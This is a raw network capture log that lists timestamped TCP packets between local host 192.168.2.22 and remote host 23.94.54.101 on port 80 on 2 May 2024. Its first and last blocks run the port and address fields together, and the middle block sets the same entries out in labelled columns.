                                                                    May 2, 2024 04:59:08.766195059 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766211033 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766244888 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766256094 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766288042 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766293049 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766304016 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766314030 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766333103 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766338110 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766345024 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766372919 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766382933 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766422987 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766441107 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766450882 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766484976 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766506910 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766518116 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766526937 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766546011 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766552925 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766587973 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766613960 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766690969 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766733885 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766756058 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766776085 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766812086 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766819954 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766850948 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766887903 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766887903 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766900063 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766911030 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.766935110 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.766953945 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.767015934 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.767021894 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.767029047 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.767040014 CEST804916323.94.54.101192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
May 2, 2024 04:59:08.767071009 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.767076015 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.767112017 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.767115116 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.767153025 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.767163992 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.767208099 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.767807007 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.774930954 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.774944067 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.774952888 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.774983883 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775022030 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775033951 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775058985 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775093079 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775135994 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775141001 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775186062 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775227070 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775240898 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775252104 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775285959 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775307894 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775353909 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775365114 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775373936 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775399923 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775415897 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775428057 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775448084 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775464058 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775497913 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775526047 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775543928 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775578022 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775614023 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775618076 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775643110 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775679111 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775696039 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775707960 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775717020 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775741100 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775758982 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775769949 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775800943 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775859118 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775870085 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775902987 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775904894 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.775943995 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775955915 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.775985956 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.776009083 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.776043892 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.776078939 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.776093006 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.776134968 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.776170015 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.776192904 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.776204109 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.776213884 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.776246071 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.784358025 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.815354109 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.866662025 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866681099 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866693020 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866703987 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866714954 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866725922 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866761923 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866787910 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866799116 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866832018 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866872072 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866883039 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866889000 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.866889000 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.866889000 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.866915941 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.866950035 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866961002 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866981983 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866992950 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.866997957 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867017031 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867023945 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867039919 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867079020 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867089033 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867110014 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867151022 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867165089 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867177963 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867214918 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867218018 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867229939 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867278099 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867296934 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867309093 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867350101 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867357969 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867369890 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867379904 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867429972 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867434025 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867446899 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867456913 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867471933 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867484093 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867500067 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867567062 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867578030 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867588043 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867609978 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867610931 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867626905 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867646933 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867655039 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867677927 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867686987 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867707968 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867746115 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867747068 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.867758989 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867779016 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.867798090 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.869235039 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869249105 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869296074 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.869687080 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869699001 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869709969 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869741917 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.869745970 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869766951 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869782925 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.869786978 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869824886 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.869831085 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869842052 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.869879007 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870102882 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870115042 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870125055 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870136023 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870151043 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870167971 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870176077 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870182037 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870202065 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870212078 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870218992 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870246887 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870255947 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870266914 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870276928 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870299101 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870321989 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870359898 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870363951 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870415926 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870435953 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870455027 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870465994 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870501041 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870505095 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870558023 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870568991 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870599985 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870619059 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870630980 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870640993 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870651960 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870665073 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870691061 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870718002 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870784998 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870795965 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870806932 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870822906 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870841026 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870892048 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870934963 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.870975018 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.870975971 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871021032 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871061087 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.871117115 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871187925 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871202946 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871231079 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.871656895 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871705055 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.871709108 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871751070 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871762037 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871788025 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.871855021 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871866941 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871877909 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871886969 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871897936 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871911049 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.871920109 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.871936083 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.871990919 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872004032 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872014046 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872030020 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872044086 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872065067 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872085094 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872095108 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872109890 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872121096 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872138023 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872152090 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872169018 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872205973 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872211933 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872224092 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872235060 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872253895 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872277021 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872309923 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872317076 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872328997 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872355938 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872364998 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872385979 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872425079 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872457981 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872468948 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872498035 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872502089 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872514009 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872524023 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872550011 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872556925 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872601986 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872633934 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872646093 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872678995 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872680902 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872724056 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872735977 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872746944 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872766972 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872800112 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872812033 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872842073 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872842073 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872855902 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872890949 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872893095 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.872914076 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.872951984 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.873029947 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.873058081 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.873095036 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.873107910 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.873120070 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.873157024 CEST  49163        80         192.168.2.22   23.94.54.101
May 2, 2024 04:59:08.873184919 CEST  80           49163      23.94.54.101   192.168.2.22
May 2, 2024 04:59:08.873197079 CEST  80           49163      23.94.54.101   192.168.2.22
                                                                    May 2, 2024 04:59:08.873208046 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873231888 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873255968 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873295069 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873297930 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873307943 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873346090 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873349905 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873415947 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873455048 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873464108 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873476028 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873505116 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873507023 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873544931 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873570919 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873583078 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873606920 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873655081 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873667002 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873678923 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873688936 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873707056 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873728991 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873740911 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873750925 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873763084 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873776913 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873800993 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873805046 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873817921 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873828888 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.873856068 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.873999119 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.874017954 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.874042034 CEST4916380192.168.2.2223.94.54.101
                                                                    May 2, 2024 04:59:08.874067068 CEST804916323.94.54.101192.168.2.22
                                                                    May 2, 2024 04:59:08.874088049 CEST804916323.94.54.101192.168.2.22
